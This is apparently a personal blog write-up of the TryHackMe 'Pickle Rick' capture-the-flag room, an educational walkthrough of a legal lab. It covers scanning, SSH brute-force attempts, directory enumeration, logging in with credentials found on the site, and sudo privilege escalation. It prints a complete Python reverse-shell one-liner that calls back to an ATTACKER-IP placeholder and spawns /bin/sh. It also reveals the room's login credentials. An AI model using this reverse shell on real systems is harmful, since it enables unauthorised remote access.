Figure. 1
The Start
Let us kick off my first write up with a lighthearted easy room Tryhackme – Pickle Rick! tryhackme.com If you do not know what a write up is let me explain. A write up is an in-depth explanation of how you exploited a machine, this allows people to better understand the process you go through when cracking a machine. As well as you might get the excellent opportunity to help someone improve their methods if they have gotten stuck. So, with that said let us jump right in.
In Figure 1, you can see we have started up our vulnerable machine. We have our target acquired and our orders (The questions) ready to go.
My first step is usually a simple ping to the server to see if I can get a response show in Figure 2. This will tell me the server is up and ICMP (Internet Control Message Protocol) packets are being accepted. That is a good sign as it means that we have a higher possibility of getting returns on our probs into the network.
Figure. 2
Next, I am going to use Nmap with –A which is Shown in Figure 3. If you do not know what Nmap is in short, it is a Vulnerability scanner. It will check for open ports, versions of the applications running on the port, the OS (Operating System) in use on the server, Ect… With only the –A command I will be running OS detection, Version detection, Default script scanning, and trace route. This should be a good start as this scan is rather quick, I can run much longer scans later if needed. I also have no need to be silent because I have permission to be here, but if I did have a need to be there are scans for that also.
Figure. 3
The scan (Figure 3) shows me ports 80 and 22 are open, 22 is used for SSH to remote into a network, and port 80 is http web traffic. With this information I know that there is most likely to be a web page associated with the I.P (Internet Protocol). I put the I.P (Internet Protocol) into the address bar on the web browser and sure enough there it is (Figure 4).
Figure 4
Looks like we get to be Morty today sweet!! Rick needs our help to get his ingredients for the pickle-reverse potion. We must log onto his computer, but he says he has forgotten the password and does not mention what the username is either or what method to use to log in. Personally, at this point I would inspect the web page by right clicking and selecting inspect to see if anything is left in the code that can help me (Figure 5). Looks like I got lucky there is his username.
Figure. 5
Figure. 6
Figure. 7
Figure. 8
I have a username and I am not worried about being silent so the first thing I will do is give this to hydra and Ncrack with the rockyou wordlist and let them go while I work other angles. Hydra and Ncrack are both brute forcing tools that can be used in several ways, you can attach words list for the username and password in an attack called a dictionary attack. We have what we think to be the username (R1ckRul3s) so I will enter that with the –l command and supply a word list with the –P command –V is for verbose –f will stop once one password that works is found, there might be situations you use –f but the rockyou list is impossibly long so I’d rather stop it (Figure. 6). I ran ncrack in verbose mode also and supplied the username and password list. (Figure. 7)
As you can see hydra comes back with does not support password authentication (Figure. 6).
Ncrack does not move past the point of starting (Figure. 7). This leads me to believe that keys are being used to log into SSH not typed passwords. I am going to test this by trying to log into the SSH and as you can see, I never even get to type a password because I am denied access with my public key. (Figure. 8)
The next step my brain tells me to try would be to enumerate the directories on the web application. To do this I will use a tool called gobuster I could have used dirb but in my experience gobuster is much faster. With the -w command to supply my wordlist the dir will put it in directory mode -u will tell the host to attack and -x will allow me to add extension onto the end of the words this can help find hidden items many times. along with this tool I am going to use another that is made specifically for web application vulnerability scans nikto. I just need to apply –h and give the attacking host I.P and nikto will do all the work. Both tools will take a while to complete so at this point, I went and ate dinner and watched T.V with my son, this will also reset my creative process, so I do not burn out.
Figure. 9
Figure. 10
When I returned both tools completed their task, and I had some interesting paths to follow now. First gobuster found /assets, /login.php, and robots.txt (Figure. 9). Additionally, nikto found the login.php page also (Figure. 10). I am going to check the robots.txt first because this can have some real cool hidden stuff on it. The robots.txt page is used to tell the browser not to show certain things to the public.
Figure. 12
I get one word on the page (Figure. 11), and I know what the word might be. Time to head over to that login.php link we are going to try R1ckRul3s as the username and Wubbalubbadubdub as the password.
We are in the money! Ok we are in; this looks like a basic command line (Figure. 12). Let us try it out!
Figure. 11
Figure. 13
Figure. 14
Turns out it is a basic command line! I am able to use ls to list everything in the directory (Figure. 13) I am in. I would like to view Sup3rS3cretPickl3Ingred.txt but when I cat it, I get this image and it says the command is disabled (Figure. 14). I guess that would have been too easy.
Figure. 15
Figure. 17
When I click any of the other links on the page, I get this image (Figure. 15). But that is ok I just had an Idea I might be able to use the command (Figure. 16) line with netcat to catch a reverse shell.
Figure. 16
I jumped over to duckduckgo and started searching for command line reverse shell netcat. That lead me to this page at inforsecademy.com After trying a few different commands, the one I got to work on was. python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKER-IP”,ATTACKER-PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
I set net cat up to listen on port 8888 (Figure. 17) chance the attacker I.P to my own and the port to 8888 and executed the command. It worked and I was in!
Figure. 18
I think the next best things I can do is stabilize the shell and get full ttyl. If you did not know the reverse shell, we got was really unstable and not a fully interactive shell. We cannot use tab to finish words or the arrow keys to do anything. So, the first thing I want to do is fix this, back to duckduckgo I just typed “full tty shell” this led me to this page at hacktricks.xyz. I used the second example, and I was good to go I had a full interactive shell. (Figure. 19)
After listing the directory, I decided to view the Sup3rS3cretPickl3Ingred.txt before I did anything else. And there it is we have our first answer. (Figure. 18)
Figure. 19
Figure. 20
Figure. 21
At this point it was time to go looking around for the other flags I needed to find. I figured that rick would have his own directory, so I went back and found the home Directory and I was right. It was that simple to find the second flag. (Figure. 20)
The last flag had to be in root, so it was time I escalated my privileges. I ran Sudo –l so I could find out what I had permissions to use Sudo for. To my surprise I had permission to use it on anything with no password. So, I go to one of my favorite sites for this gtfobins.gihub.io This is an amazing project, and you really should check it out. I just clicked the exploit I was looking for in this case Sudo found one in the list that was easy and short to use (I used Sudo find) and I was now root. I just had to restabilize the shell one more time the same way I did before. (Figure. 21) Now on to the root directory.
Figure. 22
Whooooo! We did it!! (Figure. 22) I had a blast with this machine. I hope you enjoyed the write-up. I would love it if you took something away from it, either way thank you for your time. I would be open to any ideas on how to improve myself, or how to improve the Quilty of my write-ups.